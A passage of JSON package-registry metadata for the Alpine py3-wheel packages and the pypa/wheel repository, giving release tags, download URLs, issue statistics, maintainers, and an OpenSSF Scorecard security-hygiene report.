cosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.30.0/manifests"},{"name":"0.29.0","sha":"bc574d6ed73dabee02e4e00764172d6284a37cb4","kind":"commit","published_at":"2016-02-06T17:18:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.29.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.29.0/manifests"},{"name":"0.28.0","sha":"36997ae4545f3c876771a53f11ae4aa9127cabfe","kind":"commit","published_at":"2016-02-05T21:35:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.28.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.28.0/manifests"},{"name":"0.27.0","sha":"379fe05f71fc6144d5f58e582b6580339479e238","kind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:44.181Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":14.64073262366938,"stargazers_count":14.05369442705072,"forks_count":10.75845335003131,"average":9.863220100187853},"purl":"pkg:apk/alpine/py3-wheel?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages/py3-wheel/codemeta","maintainers":[{"uuid":"santurysim@gmail.com","login":null,"name":"Peter Shkenev","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","packages_count":118,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","role":null,"created_at":"2023-08-01T09:12:22.884Z","updated_at":"2023-08-01T09:12:22.884Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/maintainers/santurysim@gmail.com/packages"}],"registry":{"name":"alpine-edge","url":"https://pkgs.alpinelinux.org/packages?branch=edge","ecosystem":"alpine","default":false,"packages_count":39517,"maintainers_count":891,"namespaces_count":3,"keywords_count":6579,"github":"alpinelinux","metadata":{"repos":["main","community","testing"],"funded_packages_count":2727},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.616Z","updated_at":"2026-06-10T05:16:50.784Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-edge/namespaces"}},{"id":7598208,"name":"py3-wheel-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-wheel","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":12,"first_release_published_at":"2023-04-18T16:39:19.000Z","latest_release_published_at":"2026-04-22T23:02:09.000Z","latest_release_number":"0.47.0-r0","last_synced_at":"2026-04-22T23:16:14.917Z","created_at":"2023-04-19T00:08:37.685Z","updated_at":"2026-04-22T23:16:15.167Z","registry_url":"https://pkgs.alpinelinux.org/package/edge/main/x86_64/py3-wheel-pyc","install_command":"apk add py3-wheel-pyc","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release 